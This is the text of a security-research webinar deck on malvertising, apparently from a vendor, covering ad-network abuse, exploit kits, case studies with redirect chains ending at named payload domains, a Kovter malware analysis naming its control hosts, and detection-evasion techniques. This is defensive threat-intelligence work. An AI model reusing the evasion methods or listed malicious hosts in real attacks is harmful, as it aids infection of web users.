Malvertising

@belogor

Your speakers today

Nick Bilogorskiy@belogor

Director of Security Research

Anthony JamesVP of Marketing and Products

Agenda

o Malvertising explainedo Exploit Kitso Case Studieso Stats and Trendso Wrap-up and Q&A

Cyph

ort L

abs

T-sh

irt

Threat Monitoring & Research team

________

24X7 monitoring for malware events

________

Assist customers with their Forensics and Incident Response

We enhance malware detection accuracy

________

False positives/negatives

________

Deep-dive research

We work with the security ecosystem

________

Contribute to and learn from malware KB

________

Best of 3rd Party threat data

Malvertising is the use of online advertising to spread malware.

Malvertising involves injecting malicious ads into legitimate online advertising networks and web pages.

Anti-Malvertising.com

What is Malvertising

How Malvertising works

df

UserVisits a popular

website, gets infected via exploit kit

WebsiteServes a banner ad,

sometimes malicious

AttackerCreates and injects malware ads into advertising network

Advertising NetworkSelects an ad based on auction, sends to the website

Malvertising in the News

Cyphort.com/blog

Malvertising history timeline

Speedtest.net ad network OpenX serves malware ad

New York Times “Vonage” banner hijacked, installed FakeAV

2007 2008 2009 2010 2011 2012 2013 2014

Malvertising technique was first identified in Flash files

Malvertising uses dynamic domain names

HuffPo, LA Weekly malvertising ads reach 1.5 Billion users

Poll Question #1

o How many ad impressions were driven by malvertisingin 2013?o Over 10 milliono Over 1 Billiono Over 10 Billion

Rise of MalvertisingOTA stats

• Malvertising increased 200%+ in 2013 to over 209,000 incidents, generating 12.4B+ malicious ad impressions.

Google stats

• Google filtered 524 million 'bad' ads in 2014, and disabled 214,000 malware websites.

Cyphort stats

• Cyphort own data shows a 300% malvertising growth in 2014

Jun-14 Jul-14 Aug-14 Sep-14 Oct-14 Nov-14 Dec-14 Jan-15 Feb-15

A u d i e n c e

Online Advertising Complexity

o 5.3 Trillion online ads served, $100+ Billion dollars spent

A dv er tis er s

Online Advertising Complexity

Karina Sanz

Publ isher s

Agencies

Media Buying Platforms DSPs

Creative OptimizationData

Optimization

Ad OpsAd Servers

Ad Servers

Ad Exchanges SSPs

Ad Networks

Sharing Data/Social Tools

Data Suppliers

DMP’s and Data Aggregators

VerificationAttributionAnalytics

Yield Optimization

Publisher Tools

A u d i e nc e

A dv er tis er s

The combination of technology and services that connect Advertisers with Publishers can be a complex process with many parties involved.

Online Advertising Complexity

Karina Sanz

Publ isher s

Agencies

Media Buying Platforms DSPs

Creative OptimizationData

Optimization

Ad OpsAd Servers

Ad Servers

Ad Exchanges SSPs

Ad Networks

Sharing Data/Social Tools

Data Suppliers

DMP’s and Data Aggregators

VerificationAttributionAnalytics

Yield Optimization

Publisher Tools

A u d i e nc e

A dv er tis er s

Almost everyone of them vulnerable to malware injection

Online Advertising Complexity

TDBank has 11 calls to third-party servers ESPN has 83 calls to third-party servers

TMZ.com has 352 calls …

Online Advertising Complexity: RTB

Techniques to avoid detection

o Enable malicious payload after a delay

o Only serve exploits to every 10th user

o Verifying user agents and IP addresses

o HTTPS redirectors

What is an Exploit Kit

o Exploit kit is a delivery mechanism for a variety of different types of malware

o First exploit kit was WebAttacker developed in 2006 and sold for $20 dollars

secpod.org

o Exploit Kits infect you without a “click”o Examples: Angler, Sweet Orange, Nuclear, RIG

Fox-it.com

Exploit Kits popularity

TrendMicro 2014 stats

Malvertising Case Studies

© Copyright 2014 Cyphort, Inc. All rights reserved. Proprietary & Confidential

Clean.navy malvertising

CLEAN.NAVYFeb 25, 2015

Clean.navy subdomain is loading Angler Exploit Kit with the exploit for CVE-2014-6332 Windows OLE Automation Array Remote Code Execution Vulnerability.

www.cyphort.com/dod-contractors-website-clean-navy-serving-drive-exploits/

1 start www.***zone.info

2 redirect ads.adgoto.com

3 redirect shop.traditionalarrows.com

4 malware payload bolivi**e.clean.navy/lists/9***

© Copyright 2014 Cyphort, Inc. All rights reserved. Proprietary & Confidential

AFFITURE malvertising

AFFITUREJan 22, 2015

20+ websites were delivering malvertising via affiliate.affyield.com using Angler exploit kit and zero-day Flash CVE-2015-0311 exploit.

www.cyphort.com/affyield-com-serving-zero-day-flash/

1 <infectedsite.biz> <infectedsite.biz>

2 redirect www.affyieldmb.com

3 redirect murzilka.eu

4 malware payload xxxxazot54moosa.in/xxx

GOPEGO malvertising

GOPEGOFeb 4, 2015

gopego.com malvertising downloads CryptoWall ransomware. The attack serves an exploit package embedded in a flash file, including exploits which target four vulnerabilities. Among them the notorious CVE-2015-0311 .

www.cyphort.com/gopego-malvertising-cryptowall/CryptoWall

© Copyright 2014 Cyphort, Inc. All rights reserved. Proprietary & Confidential

Huffington Post / AOL malvertising

HUFFINGTONPOSTJan 5, 2015

HuffPo, LA Weekly, WeatherBug and other sites reaching 1.5 Billion users, were serving malvertising via advertising.com and installing Kovter malware.

www.cyphort.com/huffingtonpost-serving-malware/

1 <infectedsite.biz> www.huffingtonpost.com

2 redirect advertising.com

3 redirect foxbusiness.com

4 malware payload Kuppicu.opoczno.pl:8080/books

HuffingtonPost malware – Kovter analysis

o Kovter is an ad-fraud Trojan (MD5 sum: A2A6A36C94D4FF5B42C346F3A3A49E7)

o Communication to C&C is RC4 encrypted and BASE64 encoded

o If it detects any indication of analysis tools, virtualization and debugging tools,o it will POST the following data to a16-kite.pw then and exit

o Else, o it will post data to a16-car.biz and then it will wait for commands.

o The C&C server can issue the following commands:o RUN – execute a fileo UPDATE – update itselfo RESTARTo FEED – Ad Fraudo SLEEP

Crawler Trends and Stats

o 35% of the domains we found were infected more than once (repeated infections)

o AskMen.com - Jun 2014o Indowebster - Sep 2014o ThePirateBay.se - Oct 2014o HuffingtonPost.com, LAWeekly,

WeatherBug.com - Jan 2015

Poll Question #2

o On which day of the week is malvertising most active?o Mondayo Wednesdayo Sundayo All days equally

Monday

Tuesday

Wednesday

Thursday

Friday

Saturday

Sunday

0 100 200 300 400 500 600

Day of the Week

Most attacks on Weekends

Malvertising chain length

o Varies from 1 to 15 redirectors, 3.8 on average.

1 2 3 4 5 6 7 8 9 10 12 13 150

50

100

150

200

250

300

350

Redirection chain length

Redirection chain length

Longest malvertising chain example: ArticleField.com

1. www.articlefield.com

2. w1ns.com

3. thfire.com

5. adsppperv.com

6. www.blog-hits.com

7. tracking1112.com

8. townsearchguides.com

9. tracki112.com

10. c.feed-xml.com

11. 109.206.188.72

12. 216.172.54.28

13. scriptforclick.com

15. spreadsheets.wiaawy.eu

14. dealsadvlist.com

4. www.thfire.com

Infected: Payload:

Infected domains

fr

de

tv

it

info

ir

ru

org

net

com

0 200 400 600 800 1000 1200 1400 1600 1800 2000

Infected TLDs

Russia1%

Austria1%

Thailand1%

Ukraine1%

Korea 2%

Hong Kong2%

Italy2%

Canada2%

China2%

Spain3%

EU3%

Netherlands4%

UK4%

France6%

Germany8%

US59%

Infected Hosting Country Origin

Payload domains

eu

vu

in

us

ua

biz

org

pl

net

com

0 200 400 600 800 1000 1200

Payload TLDs

Switzerland1%

Canada1%

France1%

Germany2%

Korea2%

Russia2%

UK3%

EU5%

Turkey11%

US72%

Payload Hosting Country Origin

Conclusionso Advertising networks get millions of submissions, and it is

difficult to filter out every single malicious one. o Attackers will use a variety of techniques to hide from

detection by analysts and scannerso Advertising networks should use continuous monitoring –

automated systems for repeated checking for malware ads, need to scan early and scan often, picking up changes in the advertising chains.

o Ad networks should have the latest security intelligence to power these monitoring systems.

o The risk increases on weekends and holidays.

Thank You!Twitter: @belogor

Previous MMW slides on

http://cyphort.com/labs/malwares-wanted/

References:https://otalliance.org/system/files/files/resource/documents/report_-_online_advertising_hidden_hazards_to_consumer_security_date_privacy_may_15_20141.pdfhttps://blog.opendns.com/2014/06/12/ads-security-dont-mixhttp://www.cyphort.com/huffingtonpost-infected-again/http://adwords.blogspot.com/2015/02/fighting-bad-advertising-practices-on.htmlhttp://in.reuters.com/article/2014/10/16/cybersecurity-military-idINKCN0I52D820141016http://www.slideshare.net/ksanz15/understanding-the-online-advertising-technology-landscapehttp://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/http://www.slideshare.net/mhmoo/us-digitalfutureinfocus2013-27520934http://www.insideprivacy.com/files/2014/05/PSI-Report.pdfhttp://blog.fox-it.com/2014/08/27/malvertising-not-all-java-from-java-com-is-legitimate/http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-evolution-of-exploit-kits.pdfhttp://secpod.org/blog/?p=1207